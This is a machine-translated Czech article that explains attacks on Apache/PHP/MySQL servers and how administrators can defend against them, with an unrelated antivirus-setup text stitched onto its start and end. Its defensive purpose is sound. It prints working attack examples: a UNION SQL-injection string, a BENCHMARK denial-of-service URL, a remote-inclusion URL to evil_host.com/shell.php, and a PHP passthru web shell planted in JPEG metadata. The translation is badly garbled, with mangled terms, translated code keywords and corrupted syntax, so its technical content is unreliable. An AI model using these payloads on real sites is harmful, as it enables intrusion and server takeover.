Tyto parametry umožňují definovat skupiny počítačů a domén podrobených skenováním. Vývoj, montáž a konfigurace individuálního systému antivirového ochrany pro váš podnik nastavení antivirového serveru


V tomto článku bych chtěl shromažďovat některé typy útoků na servery a serverové bezpečnostní nástroje z hackerů. Nemeless knihy a články jsou napsány na téma bezpečnosti. Důraz tohoto článku se provádí na základních chybách administrátorů a řešení, které je odstraní. Po přečtení tohoto článku a kontrola vlastního serveru, správce nebude dobře spát, může jen říci, že jsem prošel "minimum kandidáta".

Vzpomeňte si na správce tří přísloví,
ne! Lepší je vytisknout a viset na pracovišti před očima:
"Bezpečnost je proces",
"Když admin není nic společného, \u200b\u200bje zapojen do bezpečí",
"Bezpečnost je určena nejslabším spojem"
Článek je zaměřen na Admins * NIX + Apache + PHP + PERL + (MySQL | postgresql) a chrání servery ze vzdálených útoků, pro zbytek administrátorů. Článek, doufám, že bude jídlo pro reflexi.
V různých knihách existují různé klasifikace útoků hackerů, zavedu své rozdělení do dvou podmíněných tříd všech útoků, sdělit je:

  • Útok na služby, které jsou zranitelné a přístupné prostřednictvím internetu

Chcete-li pochopit mé divizi, představte si, že je fiktivní skript, který vzdálený útok Apache pro 80 přístavů a \u200b\u200bv důsledku útoku Apache dokončí vaši práci a zůstanete bez vašich stránek, protože není nikdo k vydání webových stránek. E-mailový server SendMail byl odeslán jako parametr pro znaky VRFY 1000 a ne krátké uživatelské jméno, SendMail neočekával takové události a zavřené, takže bez pošty. Obecný význam útoků této podmíněné třídy, v tom, že je provozována jakákoli zranitelnost žádosti. A pak tři způsoby -

  • pATH1) Aplikace bude spadat a služba nebude k dispozici, situace DOS;
  • pATH2) Aplikace začne zachytit prostředky a vyčerpá je, učiní DOS;
  • pATH3) Aplikace je hozena hedvábím a kód útočníka bude proveden;

Jedná se o všechny útoky na službu (P.P1) a oni jsou zacházeni pouze jedním způsobem: Admin bude okamžitě rozpoznat od vývojáře o přítomnosti zranitelnosti a aktualizací tohoto programu.

Útok na odstavec 2 je, když dynamická služba implementovaná v určitém programovacím jazyce umožňuje parametry a bez jejich kontrole, provádí. Například pomocí prohlížeče útočícího, procházení na místě pod kontrolou Apache, hledání zranitelností na místě samotné a využívání, dostane požadovaný. Napsáno v jazyce TCL, BOT pro moderování serveru IRC Server Server přijímá požadavky od uživatele (nové joke číslo, datum dne pro povětrnostní vlivy) a hacker, znovu vytváří práci programového kódu jističe (reverzní inženýrství), navržené požadavky, které nebyly v úvahu bot.

Zeptejte se, jak to je? Pak určitě potřebujete tento článek. Každopádně, těsně pod vše bude stojan.

Útok na zranitelné služby a server sám

V této sekci jsem absolvoval všechny útoky, jejichž flow padá na systém a služby. Často jsou tyto útoky možné z chyb implementace programu, jako je přetečení vyrovnávací paměti (přetečení vyrovnávací paměti). Pokud stručně, to vypadá takto, pojďme říkat ve špatně napsaném FTP serveru, existuje pole (vyrovnávací paměť) pro uživatelské jméno na určitý počet znaků (například 10) a přijímá takový server FTP server 100 znaků Nepřátelský, pokud tato situace není v kontrolě FTP kódu, dojde k přetečení vyrovnávací paměti.

Jaké užitečné hackeři dávají místní pufr přetečení? Můžete přepsat návratovou adresu pro škodlivý kód. Vzdáleně umožňuje provádět libovolný kód v cílovém systému, místně, pokud je program spuštěn pod kořenem "OM, to vám umožní získat oprávnění správce systému. Kód, který způsobuje přetečení vyrovnávací paměti a provádění akcí pro hacker , nazvaný Silnosode (kód shell). Psaní hedvábí je obtížný úkol. A vyžaduje znalosti znalostí montáží z hackera, což znamená profesionalitu v této oblasti.

Ochrana proti útokům na zranitelné služby a server sám

  • Aktualizace. Je třeba se naučit aktualizovat systém úplně a následně být schopen
    "Sestavte mír a jádro" pro * NIX, aktualizujte prostřednictvím systému Packet Linux a můžete stisknout tlačítko Aktualizovat v aktualizaci Windows Update pro licencované MS Windows. Pro FreeBSD Admins, musíte být schopni umístit software pomocí portů. Takže budete plavit spolu s vývojáři, a ne proti nim.

    MS Windows Admins je třeba použít k použití formátu distribuce MSI častěji, což je vysoce doporučeno společností Microsoft a podporuje aktualizaci starého balíčku. Takže, že neuděláte na serveru, zeptejte se na otázku, zda se objeví nová verze tohoto programu, jak je to jednodušší aktualizovat? Musíte vytvořit takové řešení, které plně kontrolujete, provádíte projekty s vývojem nebo opravami, ale pokud váš vývoj vyžaduje zmrazení aplikací, které potřebujete na konkrétní verzi a nemůžete použít vaše opravy do nového systému - Penny Cena na takové rozhodnutí Dokázal se!

    Udělám lyrickou odbočku a řeknu mi, jak jsem se musel zlomit. Po přečtení na internetu články, které začínají obvykle tak "stáhnout zdroj a místo, které provádějí instalaci." Co je to dál? Nová verze Jak budete dán? Držte starou verzi, aby se make (de | un) instalovat v něm? A v novém opětovném provedení instalace? Zeptal jsem se na mě tyto otázky Dmitry Dubrovin, když jsme začali mistr FreeBSD. Začal jsem pochopit, že má pravdu, a přinejmenším pro hranolky takový způsob není vhodný, a to bez ohledu způsoby vývojářů FreeBSD, jsem jen komplikoval vše.

    Nyní je Oshiving FreeBSD, když pár příkazů stáhnou nové zdroje pro jádro volného a celý systém, pak pár příkazů vytváří nový svět a jádro, a pak jsou aktualizovány porty a aplikace v systému, začnete Pochopte sílu * NIX systémů. Je obtížné sdělit pýchu, že máte zkušenosti, když aktualizujete server s FreeBSD od staré pobočky na aktuální, přestavbu světa systému, když systém sám sestavuje z nových zdrojů (vypadá to, že Munhausen se stáhl vlasy) a vše fungovalo před aktualizací, funguje také "bez selhání."

    Jak jste již pochopili, je nutné se přihlásit k rozložení bezpečnosti od vývojářů tohoto softwaru, který podporuje vaše podnikání a pravidelně aktualizovat. Aktualizujte vše a všechno by mělo být honováno a dát na kolejnice.

  • Bezpečnostní ladění.. Většina serverových operačních systémů není dostatečně nakonfigurována, ve výchozím nastavení pracovat v agresivním "chemickém" internetovém prostředí. Tak, že hackeři "nemají kontrolu" na vašem serveru, je třeba provést bezpečnostní ladění, konkrétně, přečtěte si doporučení výrobce bezpečnostního systému. Správci * NIX systémy mohou volat člověka bezpečnosti a čtení tipů pro vývojáře, aby se pohádka. Ať už je operační systém důkladně otestovat provoz serveru a služeb po ladění bezpečnosti.
  • Firewall. Konfigurovaná brána firewall, který byl zkontrolován osobně pomocí skenerů portů NMAP a skenery zabezpečení, pokud existuje výstup z těchto programů, pak pochopíte, o čem mluvíte? Při konfiguraci brány firewall nezapomeňte, že existují způsoby obejít jeho pravidla. Například existuje lokální síť chráněná bránou firewall, nastavení příznaku příznaku fragmentace paketů, můžete v určitých situacích dosáhnout adresáta v místní síti. Nebo častou chybu správce, nadměrná důvěra v odchozí balíčky vlastního serveru.

    Představte si skutečnou situaci, nepřátelský kód se snaží zahájit spojení s hostitelským hostitelem hostitele a máte pravidlo ve Firevolu "Všechno je ode mě povoleno." Tím, že vytvoří pravidla pro firewall, musíte plně reprezentovat celý obraz sítě komunikace svých služeb mezi sebou a vzdálené klienty.

  • Intiled Detection System.. Firewall může být reprezentován jako kamenné zdi na rušivě hradu. Omezeno jednou a sedět uvnitř - suché a pohodlné. Co když někdo již kontroluje sílu stěn? Možná už se musíte podívat z hradu a zaškrtnout Lulley k někomu? Chcete-li vědět, co se děje za stěnami zámku, ty, které jsou venku, musíte mít na serveru systém detekce narušení (ID). Pokud máte takový systém na základě svého balíčku, pak pokud někdo začne vyplnit z nmap-zbraně, pak budete si vědomi, a atacrew si bude také vědom toho, co víte. "
  • Analýza nestandardních situací. V mnoha časopisech v systému, nápisy "chyba: ne otevřít soubor / etc / passwd" nebo "přístup odepřen" často bliká. Jedná se o malé zvony, které volají o nesprávně nakonfigurované aplikaci, která nemůže udělat něco, někde číst, a možná to není zvon, ale Nabath, který bije alarm o hackera, který je napůl.

    V každém případě musí správce vědět o těchto věcech. Chcete-li usnadnit práci administrátora, jsou vytvořeny programy, které budou analyzovat časopisy pro vzhled zajímavých frází a poslat zprávu poštou zprávy. Nebe být pro takovou příležitost, tyto programy jsou srovnatelné se stráží, které jsou kontrolovány svěřenou cestou, a zda je vše předepsáno?

  • Odebrat verzi softwaru. Odstranit bannery ze svých služeb. Neexistují žádné ty bannery, které zobrazují na vašich stránkách, ale ty řádky, které poskytují vaše programy v pozdravech, když jsou připojeny nebo v chybovém výstupu. Nemusíte svítit verze vašich programů, hackeři ve verzích hledají dostupné programy na internetu, které operují tuto nebo tuto chybu zabezpečení (exploit - Exploit).

    Neexistuje žádné jediné řešení, například pokud vložíte nějaký program z portů, pak nepíšete, aby se instalovala čisté, takže vše je staženo bez vás, je sestaven a dodá. Lépe dělat načtení; extrakt; Poté přejděte do podadresáře souborů a tam ve zdrojovém kódu můžete řídit verzi programu nebo ji poskytnout do druhého a pak pouze nainstalovat čisté.

    Apache je velmi informativní není na místě a také svítí verze systému, PHP, PERL, OPENSSL. Zakázat hanbu s údajem o směrnicích v httpd.conf Serversigature off Servertokens prod. Na internetu můžete najít pomoc při změně bannerů do libovolného programu. Cílem je člověk zbavit útočníka cenných informací. Při pohledu na váš seznam služeb dostupných z internetu, zeptejte se, zda poskytuje další informace o sobě a informace, které uložili.

    Například server DNS Server Bind může povolit "přenos zóny" a počítače s jejich IP a doménovým názvem bude k dispozici všem, a to je špatné. Zkontrolujte svůj server s různými skenery a pečlivě si přečtěte jejich pracovní oblečení. Při výměně programového banneru vám doporučuji vložit náhodný text, ale varování o odpovědnosti a že akce jsou časopis. Vzhledem k tomu, že tam byly incidenty, když byl hacker osvobozen v soudní síni, protože nápis "Vítejte! Vítejte!" Na hacknutém FTP serveru! "

  • Pravidlo požadovaného minima. Minimalizovat dostupné služby pro internet. Odpojte zbytečné, protože nemůžete hack, co je zakázáno. Běžnou chybou, například když je Server MySQL spuštěný ve dvojici s Apache na jednom počítači nakonfigurován tak, aby je vzdáleně dostupný na standardním portu 3306. Proč? Dej netstat -na | Grep poslouchat a dát si odpověď: víte, které programy na kterém rozhraní a které port se používá? Řídíte situaci? Dobré, pokud ano.
  • Mnoho silných a různých hesel. Často ve videu Haku nebo příběhy hackerů o hackingu, fráze bliká "dobré, že admin byl jedním z hesla pro správce, který také šel do SSH a FTP." Doufám, že to není o tobě. Proto pravidlo: hesla pro různé služby by měly být jiné a ne méně než 16 znaků. Nechte je být zaznamenáni na kus papíru, pokud se bojíte zapomenout (v tomto místě zabijete bezpečnostní experty), ale je to lepší než vaše heslo dešifruje vzdálený odchod do důchodu během několika minut, protože malá délka hesla a Délka slovní zásoby pro to povoleno.

    Různá hesla pro různé služby jsou snadné, pokud budou služby autorizovány jako uživatelé systému v databázi / etc / passwd, ale jako virtuální ve vlastním planárním nebo databázovém bázi. Neodkládejte hesla na serverech v souboru password.txt všem prostředkům, na které máte jako admin.

  • Omezení. Všechny vaše služby na serveru by měly pracovat z různých omezených účtů (účet) a nikdy nefungují od kořenového účtu. Věřte mi, pokud se dostanete na zvýšení oprávnění z omezeného účtu před kořenem Stav (UID \u003d 0, GID \u003d 0), uložíte ve svém aktualizovaném systému známých otvorů.

    Mimochodem, mnoho administrátorů zapomenout taková věc, proč například účty pro práci Apache a MySQL mají přístup k Shell! Koneckonců, to může být zakázáno a namísto shellu, určete / bin / false. No, upřímně, zkontrolujte svůj odpovědný server své účty pro programy a řekněte mi, jestli se mýlím. Ve vašich základnách SQL, limit účty s minimálně nezbytnými oprávněními. Neposkytujte oprávnění souboru, pokud je voláno pouze vybrané.

  • Všechno ve vězení! Naučte si karantox nebo věznice pracovat s Sandboxes (Jail) a spustit aplikace v těchto izolovaných pokojích, to bude obtížné rozbít celý server. Pokud používáte virtualizaci, můžete šířit služby pro různé operační systémy hostů.
  • Escheened obrana. Existuje možnost zakázat něco několika způsoby na různých místech - udělejte to. Nikdy si nemyslím - zavádím to sem, zakázat více.

Přečtěte si více o útoku na zranitelné služby a server sám.

  • DOS útok (odmítnutí údržby) - útok, jehož cílem je skóre omezeného zdroje serveru (internetový kanál, RAM, procesor atd. A TP), takže server nemůže sloužit legitimním uživatelům. Figurativně řečeno, představte si to, co vás útočník zavolal a tiše tiše a tak celý večer šel. To vše je unavené a vy jste odpojili telefon, a ráno zjistili, že vynechali důležitou volání vašeho šéfkuchaře. Zde je analogie ze skutečného života DOS útoku.

    V reálném životě, DOS často vypadá takto, kvůli chybě v programu, používání procesoru skoky a dlouhé udržuje značku 100% a ATACREW periodicky používá tuto díru v programu. Crookedy Písemná aplikace může vyčerpat veškerý RAM. Nebo "poštovné bomby" ve formě silně komprimovaného souboru v souboru s mnoha znaky [Prostor], které rozbalení pro kontrolu antivirového a rozbaleného obrovského souboru přetéká sekci pevného disku na serveru nebo / a způsobí restartování serveru Reboot .

    Ochrana pro útok DOS:

    • Aktualizujte program, který je manipulován pro Dos Attack
    • Konfigurace citace zdroje pro účet, ze kterého tento program funguje. * NIX Systems umožňují konfigurovat procento využití procesoru, RAM, počtu generovaných procesů, otevřených souborů atd. atd.
    • Nakonfigurujte protokolování v programu a pokuste se najít dokovací stanici a blokovat jej v bráně firewall.
    • Konfigurace programu jako vývojář radí, Guru, podle článků na internetu, pokud jste v takové situaci.
  • DDOS (stejné DOS, ale jste napadeni několik počítačů zombie, pod vedením
    útočník). DDOS je zničena a pouze ty vandaly, které mají hejno zombied strojů, budou platit a budou vyžadovat peníze za zastavení útoku nebo poškození vašeho podnikání tak, aby uživatelé bez čtení na server šli do konkurenta. Útoky DDOS neplatí hackery, jejichž cílem je intelektuální hacking váš server, ano - ano, váš server je "hádanka", který chtějí "vyřešit".

    Jak chránit před DDOS? Pokud doufáte, že máte vlastní sílu a nástroje, můžete automatizovat operaci skriptů, aby se naučila adresy IP z různých protokolů a zadejte pravidla brány firewall. Například, autor článku "je tam nějaký život pod DDOS" ohm? "V časopise Hacker. Blokovat síť ataktorů ve firevolu, poškození DDOS může být sníženo, pokud čtete články o nastavení programů a provést Tyto pokyny. Například pro Apache mnoho článků, jak jej konfigurovat tak, aby minimalizoval poškození DDOS.

    Ochrana proti útokům DDOS:

    • Pokud je DDOS směrován do aplikace, zkuste najít rozdíly mezi příjezdovými uživateli a automatizovat skript, zadejte pravidla brány firewall v DAY
    • Pokud je DDOS směrován do systému (například protokol ICMP útoku), automatizaci skriptu, zadejte pravidla brány firewall v DAY
    • Konfigurace citace zdroje pro účet, ze kterého tento program funguje. * Systémy NIX vám umožňují konfigurovat procento využití procesoru, počet generovaných procesů, otevřených souborů atd. A TP
    • Konfigurace programu tak, jak radí vývojář, Guru, podle položek na internetu, pokud jste v takové situaci
    • Obraťte se na svého vynikajícího poskytovatele tak, aby pomáhá tomu, co bych mohl. Napište stížnost [Chráněný emailem]vlastník_setay_oto_takuyuyu. To pomůže částečně zničit síť necích, nechte ho trpět škodou, stojí za to. Zažijeme morální spokojenost.
    • Seznámit se s mod_security pro Apache, to je vynikající nástroj vám pomůže v některých situacích.
  • Útok Brutteforce hesla. Zde otvory v programech nejsou na vině, jen hrubě vyzvednout pár přihlášení / hesla. Kdo opustil server s nakonfigurovaným SSH, ale zapomněl omezit přístup SSH z určité IP a s definovanými přihlášení (směrnice v aplikaci SSH_CONFIG ElementUser), pravděpodobně viděl v protokolech pokusí předat heslo masha: password_mashi.

    Ochrana proti heslem Brutteforce:

    • Omezte počet chyb neúspěšných přihlášení / hesel
    • Pokud aplikace umožňuje konfigurovat čas pro zvýšení času před novým přihlašovacím číslem / heslem.
    • Pokud by úzký kruh lidí měl pracovat s aplikací, vytvořit takové pravidlo a omezit je

Útok prostřednictvím obsahu dynamického obsahu

Tento typ útoků se často vyskytuje na svazku Apache + (PHP | Perl) + (MySQL | postgresql) pro svět * NIX a IIS + ASP + Microsoft SQL Server pro svět MS Windows pomocí jednoduchého prohlížeče, ale to je pouze Zvláštním případem, který se používá v důsledku popularity webu. V tomto spojení jsou programovací jazyky ASP, PHP, Perl, SQL, takže často používají hackery, aby sestavili své destruktivní návrhy.

Ale nejdůležitější věc by měla být zřejmé, že takové vazy servis + horní z nich dynamický obsah V programovacích jazycích, mnoho, tedy jsou v dohledu hackerů. Zde je zde takový neúplný seznam:

  • Webový server + skripty CGI
  • Starobylé parta se nyní nepoužívá - Apache + PHF (konkrétně pH f) skripty
  • IIS + Aplikační server ColdFusion
  • SSI mechanismus (Serverová strana obsahuje)

Dále bude velkou část web-hack'e, ale nezapomeňte, že služba je správná a pro jiné připojení služby + dynamický obsah. Slova jsou jiná, ale podstata je jedna. Dnes hackeři prohlížeče útoku web, zítra klient r proti servisu Z. webový server, který je spojen s databázemi a s mnoha programovacími jazyky, se stal platformou pro útoky tohoto druhu.

Význam všech útoků tohoto druhu přichází, aby se pokusili pomocí prohlížeče, aby prozkoumal stránky, aby hledalo chyby ve skriptech, které slouží k dynamickému obsahu (obsahu) webu.

Odtud, výstup - hackování místa přes útok na webu, na kterém pouze statické html stránky leží, odkazující pouze na sebe, je nemožné. Útoky prostřednictvím vašeho webu se objevily, když lidé chtěli více interaktivity a přidali ji prostřednictvím programovacích a databázových jazyků.

Hackeři surfují podle stránek, věnujte zvláštní pozornost skriptům, které jsou přenášeny na libovolný parametr. A co když autor skriptu nekontroluje, co přesně je přenášeno jako hodnota parametru?

Obecná řešení pro admin od útoků na dynamický obsah služby (webové stránky jako zvláštní případ)

  • Aktualizace. Už jsme o tom mluvili, ale pokud používáte workshop třetích stran (fórum, galerie, chat a tak dále a P), pak získat zprávy o zranitelnostech a západkových otvorech. Pohled na hackeři je takový, pokud portál pracuje s financemi a jejich obratem, pak na takovém portálu není žádoucí pro nikoho jiného než jejich vlastní. Samozřejmě se rozumí, že vývoj vlastních motorů na stránku napsal kodéry, kteří vědí, jak bezpečně programovat a mít koncept hrozeb na internetu.
  • Nestandardní. V mnoha hackerových nástrojích, základy zranitelných stránek často blikaly cesty fórum /, galerie /, obrázky /. Velmi pohodlně! Znát admin, polovina z nich bude sdílena a vrhá na vašich stránkách, když vaše stránky nejsou umístěny v / usr / www a váš administrátor není site.com/admin. Podstatou je taková, že pokud nejste standardní, pak se jedná o další tyčinky v hackera kola, které útočí na vaše stránky. Bude muset přidat / správně na ruční základnu / skript. Je to vždy hacker nebo to chce? Mladí hackeři "Script-Kidisov" určitě vystraší. Zde například bezpečnostní tipy PHP

    # Make PHP kód vypadá jako ostatní typy kódů
    Aplikace AddTyPe / X-httpd-php .asp .py .pl
    # Učinit kód PHP vypadá jako neznámé typy kódy
    AddType Application / X-httpd-php .bop .foo .133t
    # Make PHP kód vypadat jako HTML
    Aplikace AddTyPe / X-httpd-php .html .htm

    Tato forma zabezpečení pro PHP přes Skrýt má malé nedostatky za nízkou cenu. Hackeři sami, popisují své hacky, napište, že stáhnete stejný software, který je umístěn na serveru, z webu vývojáře a podívat se s tím, jaká výchozí názvy tabulek / cest / funguje jeden nebo jiný motor. Obecným významem na nestandardnost je utáhnout proces hackingu tak, že blitzkrieg nefunguje, a čím více táhne, tím větší je pravděpodobnost jeho detekce.

  • Odebrat verze motorů a skriptů na webu. To je cenné informace, které mají být zbaveni ATACKER, znát verzi, kterou hledají hotová řešení pro hacking. Zkontrolujte, zda vaše skripty nezobrazují užitečné informace, například: Cesta ke skriptu, kde se chyba stala (problém "Zveřejnění cesty") a samotný výstup chybu.
  • Přemýšlejte o potřebě .htaccess. Přítomnost souborů.htaccess znamená, že můžete zrušit své možnosti zadané v nejvíce konkomantu, věřte mi, hackeři budou dělat. Pokud zrušíte použití .htaccess pomocí směrnice ElementoverRide Žádná, pak obdržíte zisk v výkonu Apache, protože nebude zobrazit všechny adresáře na cestě k webové stránce a zlepšit bezpečnost webového serveru Apache.

Přečtěte si více o útoku na dynamický obsah (webové stránky jako speciální případ)

  • XSS (skriptování přes web).
    Intercamet Scripting se nazývá XSS a ne CSS, protože CSS je časná zkratka, což znamená "Styl Cascade Style." Útoky XSS jsou směrovány proti serveru, ale proti uživatelům tohoto serveru. Ale admin není nutný! Útok XSS vypadá takto, na místě jsou upravitelná pole na webové stránce nebo parametrech skriptů, které nejsou filtrovány na konstrukci návrhu<, >, JavaScript.

    Hacker dodává kód do upravitelných polí v programovacím jazyce nainstalovaném na straně klienta, je obvykle Java a VBScript a tento kód se stává součástí stránky HTML. Když uživatel navštíví tuto stránku, jeho prohlížeč, demontovaný stránku provede tento kód.
    Co dělá hackery díky XSS?

    • Krádež cookies (cookie, housky) - informace, které uživatel "dal" uživatel byl uložen v těchto textových souborech uživateli za následnou identifikaci. V příkladu, pokud vytvoříte soubor test.html s takovým obsahem (napište si s rukama sami), pak při spuštění v prohlížeči se zobrazí XSS.
      Vážený admin, měl jsem chybu při návštěvě webu
      Pomoc

      Ale můžete napsat skript na Javu a vážnější. Takové skripty jsou obvykle napsány na webové schránce Správce a pomocí sociálního inženýrství, zkuste to přečíst zprávu, aby si to cookies.

      Pokud není vazba na adresu IP a dodatečná ochranná opatření, je nahrazena vaším cookiesem na cookies admin a pokusí se dostat do panelu Admin, který nezkontroluje přihlašovací jméno a heslo a identifikuje lidi pouze v cookies.

    • Defeface Site (Deface - nahrazení stránky stránky, nejčastěji index.html)
    • TROJANIZOVÁNÍ Vzdáleného uživatele. Čerstvé využití jsou vybrány pro prohlížeče uživatelů a když zadají zranitelnou stránku, zvolá se pokus o infikovat počítač TROYAN. Pokud má uživatel antivirus s čerstvými bázemi, zobrazí se, zobrazí se v systému Trojer. A vaše stránky budou spadat do očí uživatele, možná už k vám nepřijme.
    • DOS. S velkým počtem návštěvníků, skript bude navíc požadovat další stránky z vašeho serveru nebo z druhé, někdo může být DOS.

    Řešení problému:

    • Chcete-li uzamknout záznam značky HTML do databáze z polí pro zadávání informací, použijte návrhy, jako je HTMLSPECIALCHARS pro PHP, které budou vyměněny.< на <, > Na\u003e, & on & a tak dále
      Příklad,

      $ Comment \u003d htmlspecialchars ($ komentář, ent_quotes);
      $ Query \u003d "Insert do guestbook
      (Jméno, umístění, e-mail, adresa URL, komentář)
      ("$ Jméno", "$ umístění", "$ e-mail", "$ url", "$ komentář") ";
      Mysql_query ($ dotaz) nebo zemřít (mysql_error ());

    • Zkontrolujte a filtrujte všechny parametry ve skriptech, které vstupují uživateli a přenášeným skriptem prostřednictvím panelu adresy. Prozkoumat, jak aplikovat regulární výrazy pro analýzu příchozích dat. Pro váš programovací jazyk naleznete materiál, který obchoduje zabezpečený programování.
    • Pokud chcete použít technologii Cookie na svých stránkách, přečtěte si zabezpečené způsoby práce s cookies. Omezit jejich akce v čase a IP adresami.
    • Jako admin byl výstražný, když jste chováni sociální inženýrství. Nezapomeňte na bezpečnost počítače v klientském počítači.
  • SQL Injekce. SQL Injekce.
    Tato nemoc označuje, že neověřený parametr je nahrazen v dotazu SQL se zobrazí ve skriptu. Skripty, SQL Injekce po návaznosti na hacker nalezení jednoduchým způsobem, site.com/view.php?id\u003d1 je dodávána do hodnoty parametru nebo číselný parametr je upraven jako site.com/view.php?id\u003d 2-1.

    Pokud substituovaná nabídka způsobí "ERROR" (spoustu zpráv, které nesledují takový požadavek v takovém skriptu pro takovou cestu), pak takový skript pro jeho čerpání dále. Často, útočníci si vychutnávají Google Hack "Ohm, žádají o vyhledávače o těchto požadavcích" Site: www.izveva.ru VAROVÁNÍ ". Vyhledávač Google uvádí nesprávné skripty na vašich stránkách, tak starověkých, že již dlouho indexují Spider Google .

    Kód, který nekontroluje a trpí SQL Injekce

    $ id \u003d $ _request [id];
    $ Výsledek \u003d MySQL_Query ("Vybrat titul, text, Datewsews, autor z" News ", kde` ID` \u003d "$ ID");

    Nyní si představte, že namísto čísla budete odesláni "-1 Unie Zvolte NULL / *" (bez uvozovek) a pak se váš požadavek změní

    Zvolte Název, Text, DateNews, Autor z `News` Kde` ID` \u003d "- 1 Unie Vyberte null / *"

    To znamená, že hacker chce, kromě vaší žádosti, byl dokončen s jeho žádostí, Unie, se směrnicí Unie. A pak se hacker pokusí vypracovat další požadavky a vzhledem k síly jazyka SQL, to není dobrý obdiv. Defeisa (Deface - nahrazení stránky spuštění stránky), než získáte kořenová práva na serveru. Hacker může také strávit DOS útok díky SQL Injekce: site.com/getnews.php?id\u003dbenchark(10000000, benchmark (10000000, MD5 (Current_date))) dvojice těchto požadavků a serveru 100% procesoru načítání na dlouhou dobu.

    Ochrana injekce SQL:

    • Aktivně používejte servery SQL, jako jsou podání (zobrazení) a uložených procedur. To omezí neoprávněný přístup k databázi.
    • Před odesláním parametru na žádost musíte jej zkontrolovat (pro PHP - IS_Bool (), IS_FLOAT (), IS_Int (), IS_StRing (), IS_Object (), IS_Object (), IS_ARRAY () a IS_Inger ()) a minimální, citováno Použití designu typu AddSlashes pro PHP.
    • Všechny skripty pracují s databází z nějakého účtu databáze, odebrat všechna oprávnění, která nejsou nutná k práci. Často hackeři používají příkaz mysql (MySQL je převzato na příklad, to se týká jakéhokoliv serveru SQL Server) "Načíst data Infile" pro čtení souborů, které potřebujete od serveru a přístupný ke čtení účtu, které MySQL funguje. Proto je výstup, odpojte zbytečná oprávnění pro své skripty, například soubor, který je potřebný k použití příkazu Infile Load Data Infile. Princip "Hlavního minima" musí být považováno za základ.
    • Systémový účet, ze kterého server SQL Server by neměl mít přístup k stránkám webu a soubory serverových systémů.
  • Připojení souborů. Zahrnout soubor. Předpokládejme, že existuje stránka site.com/getnews.php.php.file\u003d190607 stránka, ale skript se používá obsah, připojuje stránku bez kontrol.

    $ File \u003d $ _REQUEST ["soubor"];
    Zahrnovat ($ soubor ". Html");

    Hacker, namísto 190607 bude nahradit zlo_host.com/shell.php a pak celá řada adresního řádku hackerového prohlížeče bude vypadat jako stránka.com/postnews.php?file\u003dEvil_host.com/shell.php a na vašem webu hacker bude mají vlastní web s právy, které Apache má.

    Ochrana připojení k souboru:

    • Zkontrolujte a filtrujte všechny parametry ve skriptech, které vstupují uživateli a přenášeným skriptem prostřednictvím panelu adresy. Pro váš programovací jazyk naleznete materiál, který obchoduje zabezpečený programování.
    • Hackeři se opravdu líbí, když programovací jazyk na webu umožňuje spustit systémové příkazy. V důsledku toho musíte zakázat volání takových funkcí ve vašem programovacím jazyce, pokud samozřejmě není možné. Například v Nastavení PHP je možné určit seznam "zakázaných" funkcí pomocí Disable_functions v Php.ini.
  • Trojský obraz
    Pokud máte na stránkách možnost nalijete soubory na server, připravte se pro vyplnění, například obrázky avatarů. Na obrázku ve formátu JPEG existuje pojetí metadat (nezapomeňte, kde photoaprat zapíše informace při fotografování rámečku) a v těchto metadat budou zaznamenány

    "; Pasjhru ($ _ dostat [" cmd "]); echo""; ?>

    obrázek je přejmenován avatara.jpg.php, obejít většinu kontrol na rozšíření a bude používat site.com/upload_images/avatara.jpg.php?cmd\u003d_Server

    Ochrana proti trojsku:

    • Správně zkontrolujte příponu souboru. I když správně zvládnete povolené soubory, připravte se, že obraz z JPG v PHP je přejmenován pomocí jiné chyby zabezpečení na vašem webu. Zkontrolujte přítomnost v obraze metadat pomocí funkcí takové exif_read_data () v PHP.
    • Zakázat vašem webovým serverem provést programovací jazyky v katalogech obrázků. Chcete-li to provést, zobrazte konfigurace APCAA aplikace AddTtyPe Aplikace / X-httpd- "Konfigurace, které propojte programovací jazyky s rozšířením souboru a zakazují jejich provádění v katalogech obrázků. Pro zákaz Apache po php souborů bude design


      OBJEDNÁVKA DAY, Povolit
      Odepřít ze všech

    • Pro váš programovací jazyk naleznete materiál, který zásobníky bezpečného programování při zpracování snímků a správně vyplňte na server.

Osobní díky:

  • přítel Alexander Pupyshevka aka Lynx pro kritiku a radu
  • site Antichat.ru/
  • site XeP.ru/
  • rezervujte si Michael Eben, Brian Taiman. Freabsd Správa: Art Rovnibrium Art
  • joel Skembrey Book, Stuart McClar, George Kurtz. Tajemství hackerů: Síťová zabezpečení - Ready-made řešení. Druhé vydání

Další zdroje informací o ochraně:

  • Bezpečnostní stránka FreeBSD Man obsahuje popis běžných problémů na ochranu a správné správy postupů.
  • Přihlásit se k odběru FreeBSD-Security @ FreeBSD.org Newsletter. Chcete-li to provést, odešlete dopis Majordomo @ FreeBSD.org s textem Přihlásit se FreeBSD-Security v telefonní zprávě. Je v tomto seznamu poštovního seznamu, který je diskutován nejvíce skutečné problémy na ochranu.
  • FreeBSD FreeBSD.org/Security/ Ochrana Informace
  • Dokument FreeBSD zabezpečení Jak
  • Místo cert.org obsahuje informace o zranitelných místech ochrany všech operačních systémů.
  • Kniha "Firewalls & Internet Security" William Cheswick (William R. Chesswick) a Steven M. Bellownin
  • Kniha "Stavební firewalls v Internetu" (Budova internetové brány firewall, 2nd Edition) Brent Chapman (Brent Chapman) a Elizabeth Zwicky

Výsledek:
Doufám, že vám článek pomohl vidět všechny problémy společně, nyní admin potřebuje číst o zabezpečení počítače, databází, webových serverů, programovacích jazyků z dalších zdrojů. Shrnutí krátce článku, musíte si být vědomi novinek o výstupu bezpečnostních problémů, aktualizovány a kontrolujte svou práci všechna vstupní data o správnosti.
Kéž má síla přijít s vámi!

Jak správně organizovat obranu počítačových sítí od škodlivého softwaru.

Článek je určen správci systému Novice.

Pod antivirovou ochranou, myslím ochranu před jakýmkoliv škodlivým softwarem: viry, trojské koně, kořenové velryby, podložky, ...

1 krok na antivirové ochraně - instalace antivirového softwaru na každém počítači v síti a aktualizovat alespoň denně. Správná aktualizace schéma anti-virů databází: 1-2 Servery Jít na aktualizace a distribuci aktualizací do všech počítačů v síti. Nezapomeňte umístit heslo pro zakázání ochrany.

Antivirus pro mnoho nevýhod. Hlavní nevýhodou - nezachytí viry napsané na objednávku a které nebyly rozšířené. Druhou nevýhodou je načtení procesoru a obsazení paměti na počítačích, někdo více (Kaspersky), někdo méně (ESET NOD32), je třeba zvážit.

Instalace antivirového softwaru je povinná, ale nedostatečná metoda ochrany proti virovým epidemikám, často se virus podpis objeví v antivirovém bázi následující den po distribuci, po dobu 1 dne může virus paralyzovat provoz všech počítačových sítí.

